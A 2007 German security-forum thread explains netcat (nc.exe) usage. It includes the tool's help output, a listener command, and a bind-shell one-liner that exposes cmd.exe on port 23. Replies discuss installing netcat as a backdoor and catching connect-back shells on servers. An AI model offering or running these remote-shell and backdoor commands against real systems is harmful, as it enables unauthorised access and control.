Wie funktioniert nt.exe ? (netcat)

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von mySQL, 17. August 2007 .

Schlagworte:
  1. 17. August 2007
    Hi, Leute!
    kann mir jemand erklären wie netcat funktioniert?
    und deren command lines?
    hab zwar bei wiki bisschen was gefunden, aber nichts was mir wirklich weiterhilft unter dem gebrauch und handhabung von netcat....
    danke für eure hilfe
     
    + Multi-Zitat Zitieren
  3. 17. August 2007
    AW: Wie funktioniert nt.exe ? (netcat)

    also den nutzen davon hab ich auch noch nicht erkannt. vllt daher dass ich es mir nicht gezogen habe ^^
    schau doch mal in der hilfe nach bzw in den manpages. da steht meistens schon einiges
     
    + Multi-Zitat Zitieren
  4. 17. August 2007
    AW: Wie funktioniert nt.exe ? (netcat)

    keine lust das jetzt genau nachzu schlagen und jedes command einzeln zu erklären.

    in kurzform:

    du kannst damit einen listener bauen, der auf eine connectback shell reagiert und dir somit zugriff auf andere server ermöglicht.
    nc.exe -l -vv -p 4444

    damit hört er auf port 4444 und wenn was kommt siehst du was kommt.

    mit nc.exe ip port verbindeste dich auf ne shell auf nem server
    und irgendwie kannste das noch als shell auf einem server nutzen, das hab ich allerdings noch nicht gemacht. weiß nicht wie das geht.

    schau dir sonst halt mal die hilfe von nc.exe an,
    bekommste wenn du
    nc.exe -help
    eingibst ne liste mit den commands und die erklärungen. wenn du bei irgendwas nicht weißt was das ist, fragste halt nochmal oder schaust auf wikipedia oder google oder sowas nach.
    Code:
    [v1.10 NT]
connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -l -p port [options] [hostname] [port]
options:
 -d detach from console, stealth mode

 -e prog inbound program to exec [dangerous!!]
 -g gateway source-routing hop point[s], up to 8
 -G num source-routing pointer: 4, 8, 12, ...
 -h this cruft
 -i secs delay interval for lines sent, ports scanned
 -l listen mode, for inbound connects
 -L listen harder, re-listen on socket close
 -n numeric-only IP addresses, no DNS
 -o file hex dump of traffic
 -p port local port number
 -r randomize local and remote ports
 -s addr local source address
 -t answer TELNET negotiation
 -u UDP mode
 -v verbose [use twice to be more verbose]
 -w secs timeout for connects and final net reads
 -z zero-I/O mode [used for scanning]
port numbers can be individual or ranges: m-n [inclusive]
     
    + Multi-Zitat Zitieren
  5. 17. August 2007
    AW: Wie funktioniert nt.exe ? (netcat)

    Es gibt 2 versch. "Varianten".
    Wenn man es als Backdoor installiert, dann kann man sich immer darüber verbinden (shell).
    Wenn es aber jemand anderes findet und er sich einloggen kann hast du ein Problem.

    Bei der zweiten Variante kannst du dich nur einmal mit der shell verbinden, sobald du disconnectest kommst du darüber auch nicht mehr auf den Server.

    Die Hilfe gibt dir dazu aber schon Infos (über die Parameter).:]
    Über Google sollte sich auch noch einiges finden lassen.
    Ich hab nc.exe selber schon verwendet.
     
    + Multi-Zitat Zitieren
  6. 17. August 2007
    AW: Wie funktioniert nt.exe ? (netcat)

    okay danke!
    weißt du ob es möglich ist, via nt.exe auf einem server ein anderes programm zu starten? zB mspaint.exe ?
    wie würde dafür die command line aussehn? (als beispiel, wenn dies möglich ist)

    Aber danke für die Info, hat mir bisschen weitergeholfen!
     
    + Multi-Zitat Zitieren
  7. 17. August 2007
    AW: Wie funktioniert nt.exe ? (netcat)

    Schau dir die Hilfe an!
    Der Parameter -e gefolgt vom Programmnamen.exe führt das Nachfolgende Programm aus.
     
    + Multi-Zitat Zitieren
  8. 17. August 2007
    AW: Wie funktioniert nt.exe ? (netcat)


    Klar wenn du ertmal ne connectback connection hast oder du dich zum listenden Port connectest hast, hast du eine vollfunktionierende Shell ( also wie diene CMD zu hause). Dann kannst du einfach über denn command mspaint wie bei dir zuhause paint öffnen. Oder auch böse Sachen anstellen. Daten transferieren, starten... usw.... Du kannst die nc bei dir auf einem port listen lassen und per command den server zu dir connecten lassen. (connectback) Oder du lässt auf dem Server nc auf nem port listen und connectest dich von local auf den server. command:nc ip Port Man kann mit nc auch daten transferieren und co... Ein ziemlich geiles Ding.

    So kriegste acces zur winshell: nc -l -p 23 -t -e cmd.exe (listet nun auf port 23)


    Achja und les dir das mal durch:

     
    + Multi-Zitat Zitieren
  9. 17. August 2007
    AW: Wie funktioniert nt.exe ? (netcat)

    Hier sind noch Anwendungsbeispiele:
    netcat
    remoteshell-security.com: Netcat Guide

    HIGHGAMES - PC GAMES AND HARDWARE - HARDWARE-VIEW - NETCAT UND CRYPTCAT

    Eine alternative zu Netcat ist CryptCat, dabei wird der Transfer mit Twofisch verschlüsselt.

    PS: Die exe heißt nc.exe nich nt.exe
     
    + Multi-Zitat Zitieren
  10. Video Script

    Videos zum Themenbereich

    * gefundene Videos auf YouTube, anhand der Überschrift.

Auf dieses Thema antworten